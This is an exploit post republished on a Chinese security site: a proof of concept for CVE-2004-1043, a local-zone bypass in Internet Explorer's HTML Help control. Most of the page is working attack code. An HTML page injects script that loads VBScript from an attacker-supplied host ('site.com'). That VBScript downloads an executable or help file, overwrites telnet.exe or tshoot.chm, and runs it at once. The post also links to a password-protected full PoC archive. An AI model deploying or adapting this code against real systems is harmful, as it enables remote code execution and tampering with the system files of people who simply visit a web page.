首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Internet Explorer HTML Help Control 4.74 Bypass
来源:vfocus.net 作者:Prado 发布时间:2018-06-28  
# Exploit Title: Microsoft Internet Explorer (CVE-2004-1043) - HTML Help Local Zone Bypass Vulnerability : Enhanced!

# Google Dork: N/A

# Date: June, 26, 2018

# Exploit Author: Eduardo Braun Prado

# Vendor Homepage: http://www.microsoft.com/

# Software Link: http://www.microsoft.com/

# Version: HTML Help Control v.4.74

# Tested on: Windows 98/ME/2000/XP (2003 is vulnerable too but you need to allow ActiveX and scripting on the Internet Zone of IE)

# CVE : CVE-2004-1043


MS IE HH Control Cross Domain Scripting vulnerability, enhanced to overwrite arbitrary local files and execute code instantly
without the need to save files to startup folder. This is accomplished through an ADO object that has pretty much the exact same functinoality
of the recently killbitted 'ADODB.Stream' object. This object was probably killbitted since lots of users, specially enterprises, were complaining
about allowing an ActiveX that is able to overwrite files on the system to be initialized. The problem is that Microsoft forgot about 'ADODB.Stream''s "cousin":
'ADODB.Record', which is even easier to use and requires less lines of code, but there's a small trick I had to use to get it to actually write files on
the target system.


Vulnerable versions of Windows (and the HH component) can be exploited by malicious people to inject script code in arbitrary domains,
including local files; In this case it's possible to run arbitrary code, by design, since it's the local machine zone of MS IE.
On XP SP2, an important feature that had just been introduced (Local Machine Zone Lockdown) could be defeated.

Below is code modified and improved by me, so it works on any version of Windows and run code instantly, without the need to save HTAs to
startup folder; Link for the full PoC which has the CHM file and the project that can be compiled using HTML Help Workshop program:


=FULL POC Link=

https://onedrive.live.com/?id=AFCB9116C8C0AAF4%21339&cid=AFCB9116C8C0AAF4


- download the file "HH_CVE-2004-1043_PoC_Enhanced.zip"

password: 2004


Below is the exploit, improved, so we don't have to guess the startup folder path (differs on Windows OS languages)
and run code instantly, without the need to reboot.


Important: Some PoCs over the internet has non-functional code to execute payloads via the 'HH Shortcut' feature.
The reason for it not working is that HH shortcut feature is only enabled to programs that invokes HH via HtmlHelp() API,
which is the case for Microsoft Help and Support Center, and thus the code I am providing INDEED WORKS!!



================================================================================================
HHxpl.htm
================================================================================================

<html>
<OBJECT id="localpage" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\
PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>

<!-- in the 'javascript:' URL below change 'site.com' with your host/IP -->

<OBJECT id="inject" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:
execScript("document.write(unescape(\"%3Cscript%20language=vbs%20src=http://site.com/run_instantly.vbs%3e%3c/script%3e\"))")'>
</OBJECT>

<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
</html>

================================================================================================
  run_instantly.vbs
================================================================================================

On Error Resume Next


customEXE="file.exe"
customCHM="tshoot.chm"

Set ar = CreateObject("ADODB.Record")

Set xmld = CreateObject("MSXML2.DomDocument")
a = xmld.load("file://C:/windows/pchealth/helpctr/system/sysinfo/msinfo.xml")

'check if target is running Windows XP with Help and Support Center feature.



If a = true Then

ar.Open customCHM,"URL=http://site.com/"  ' replace site.com with your host
ar.CopyRecord "","file://C:/windows/help/tshoot.chm"  ' overwrites the legitimate 'tshoot.chm' help file.

setTimeout "ExecCommandXP()",200,"VBScript"

Else

ar.Open customExe,"URL=http://site.com/"  ' replace site.com with your host
ar.CopyRecord "","file://C:/windows/system/telnet.exe"  ' overwrites the legitimate 'telnet.exe' file on Win 9x/ME

If Err.Number <> 0 Then

ar.CopyRecord "","file://C:/winnt/system32/telnet.exe"  ' overwrites the legitimate 'telnet.exe' file on Win NT/2000

End If

setTimeout "ExecCommandWin()",200,"VBScript"

End If


Sub ExecCommandXP()

document.write "<iframe src=hcp://help/tshoot/dvdregion.htm></iframe>"

End Sub


Sub ExecCommandWin()

document.write "<iframe src=telnet://127.0.0.1/></iframe>"

End Sub

=========================================EOF=======================================================

Cheers!




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Quest KACE Systems Management
·Polaris Office 2017 8.1 Remote
·KVM (Nested Virtualization) -
·Cisco Adaptive Security Applia
·Foxit Reader 9.0.1.1049 - Remo
·Geutebruck 5.02024 G-Cam/EFD-2
·Opencart < 3.0.2.0 - Denial of
·Core FTP LE 2.2 - Buffer Overf
·IPConfigure Orchid VMS 2.0.5 -
·VMware NSX SD-WAN Edge < 3.1.2
·Audiograbber 1.83 - Local Buff
·Enhanced Mitigation Experience
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved